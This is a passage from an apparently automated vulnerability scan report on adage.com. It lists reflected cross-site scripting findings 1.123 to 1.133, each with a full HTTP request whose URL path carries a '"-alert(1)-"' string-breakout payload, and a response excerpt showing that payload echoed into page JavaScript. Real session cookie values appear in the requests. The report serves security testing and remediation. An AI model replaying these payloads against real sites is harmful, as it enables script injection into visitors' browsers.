Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=7C01F0407CDBFDB536C693C47FAAA8E3EA06366C; path=/
Set-Cookie: HMAC=3FCE26F7975EF64C3485BC6ADD209E4F49E670A8; path=/
Set-Cookie: HMAC=1EE136AE4BC7CB2223E8568CBF075D130AF22CE9; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313959833";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images5e8db"-alert(1)-"34400a44cf3/covers/current_thumb.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms
...[SNIP]...

1.123. http://adage.com/images/covers/current_thumb.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/covers/current_thumb.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f41c"-alert(1)-"9daea6c72f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/covers1f41c"-alert(1)-"9daea6c72f4/current_thumb.jpg?1313959833 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=A994E73B4EC4AFA4C1A68D85C122B15170E31B66; path=/
Set-Cookie: HMAC=6B691B48DA074BDB41DBB9951400754E5957482A; path=/
Set-Cookie: HMAC=6137FBA31A70AC161B60B1E0A29C2D89624C4007; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313959833";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/covers1f41c"-alert(1)-"9daea6c72f4/current_thumb.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.124. http://adage.com/images/covers/current_thumb.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/covers/current_thumb.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56835"-alert(1)-"35529e80084 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/covers/current_thumb.jpg56835"-alert(1)-"35529e80084?1313959833 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=7F8F2EB234FAA0DDEA15FF9E48B4DBBFA7E5AA87; path=/
Set-Cookie: HMAC=57791D9528900513A9562BDF1792BF764C08250C; path=/
Set-Cookie: HMAC=20FE58E3A742FFC83E26B77B48D6F96C77F94271; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313959833";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/covers/current_thumb.jpg56835"-alert(1)-"35529e80084"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.125. http://adage.com/images/menus/menu_image_9.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/menus/menu_image_9.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a70a2"-alert(1)-"4d9258f54d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesa70a2"-alert(1)-"4d9258f54d5/menus/menu_image_9.png?1291744533 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=91BA507C15B51F53AFF9E3148C3CDF415DD5BE68; path=/
Set-Cookie: HMAC=61874494678E35F276BE5581B4E2B1BB2B6C9C7B; path=/
Set-Cookie: HMAC=71CD6E8494BA0733D7E04A6A0266035429B97F96; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49465
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744533";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/imagesa70a2"-alert(1)-"4d9258f54d5/menus/menu_image_9.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.
...[SNIP]...

1.126. http://adage.com/images/menus/menu_image_9.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/menus/menu_image_9.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8cf4"-alert(1)-"728edc0a87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/menusc8cf4"-alert(1)-"728edc0a87/menu_image_9.png?1291744533 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=0F093E4AFE5318C1A46F495C34BD890B8E72BB69; path=/
Set-Cookie: HMAC=58E5D0362EB12EBDED2EA0D7F0B09A4435BE2772; path=/
Set-Cookie: HMAC=2F5A66A976B4089083BBA889AFAA9132EE45C797; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49464
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
X0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744533";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/menusc8cf4"-alert(1)-"728edc0a87/menu_image_9.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
h
...[SNIP]...

1.127. http://adage.com/images/menus/menu_image_9.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/menus/menu_image_9.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bf2a"-alert(1)-"9bdd8378318 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/menus/menu_image_9.png6bf2a"-alert(1)-"9bdd8378318?1291744533 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8610679F5B7DE9959FBF876E60CB066A017FE3E7; path=/
Set-Cookie: HMAC=A355FF8C0FCEC0715951C749BD1D721D365C3CD2; path=/
Set-Cookie: HMAC=FDF5B0E1D4D3A12884F8F03CB3D0053AEFCCB3D8; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49465
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
hg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744533";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/menus/menu_image_9.png6bf2a"-alert(1)-"9bdd8378318"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.128. http://adage.com/images/rss.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/rss.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6306a"-alert(1)-"90f8bc51e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images6306a"-alert(1)-"90f8bc51e4/rss.gif?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=EF2918B128E72C1B4136C6136EB648F7FC851B20; path=/
Set-Cookie: HMAC=2131AD37D643825F5E70D7815C3B398E66105948; path=/
Set-Cookie: HMAC=74AEC57CF10D88DCD7ADF9EFE2CAE5D33521F9F6; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49449
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images6306a"-alert(1)-"90f8bc51e4/rss.gif"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y
...[SNIP]...

1.129. http://adage.com/images/rss.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/rss.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18951"-alert(1)-"18895c5edbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/rss.gif18951"-alert(1)-"18895c5edbc?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=F83F81A9FE4B8D1E34783B06D038F96703E8DCAE; path=/
Set-Cookie: HMAC=499E2B9B025F826E0FB6D69CF596B1711B436F6B; path=/
Set-Cookie: HMAC=301D7CF40E3CB4D8FE2E7B4A7FBAE82E9EDBD944; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49450
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/rss.gif18951"-alert(1)-"18895c5edbc"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.130. http://adage.com/scripts/aa-jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/aa-jquery.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b5c1"-alert(1)-"efd1d275b29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts6b5c1"-alert(1)-"efd1d275b29/aa-jquery.js?1306163348 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=491FC80627954408486863FA6BD1D82C4211B01B; path=/
Set-Cookie: HMAC=6928066DAD3F8CE2BBD6039141CE9D8C1492B9DD; path=/
Set-Cookie: HMAC=AC4FE141C8834964525E237A2D398A6885C33EB8; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49456
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1306163348";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts6b5c1"-alert(1)-"efd1d275b29/aa-jquery.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.d
...[SNIP]...

1.131. http://adage.com/scripts/aa-jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/aa-jquery.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc2e6"-alert(1)-"a88223141ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/aa-jquery.jscc2e6"-alert(1)-"a88223141ca?1306163348 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=DCB69A9480373970B3399FCEF944943FB7052B18; path=/
Set-Cookie: HMAC=71B34320A1D1B58CEA68571D5DB3FC0AA5CFC1E8; path=/
Set-Cookie: HMAC=EB3F5FE75DE03BF93C871E94DA34E7C7E2ECA470; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49456
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1306163348";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/aa-jquery.jscc2e6"-alert(1)-"a88223141ca"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.132. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/fancybox/jquery.fancybox-1.3.4.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbaea"-alert(1)-"eeefe3ca7cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scriptsbbaea"-alert(1)-"eeefe3ca7cb/fancybox/jquery.fancybox-1.3.4.css?1298944774 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=EB2DD19DA59BDBE9084BFE874E00705245027887; path=/
Set-Cookie: HMAC=C142B740DF1382D46A75D81B151DBF7CDD5AE67C; path=/
Set-Cookie: HMAC=077448339BAA2DBF49713EA3074192BFD86751C9; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298944774";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scriptsbbaea"-alert(1)-"eeefe3ca7cb/fancybox/jquery.fancybox-1.3.4.css"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.
...[SNIP]...

1.133. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/fancybox/jquery.fancybox-1.3.4.css

Issue detail

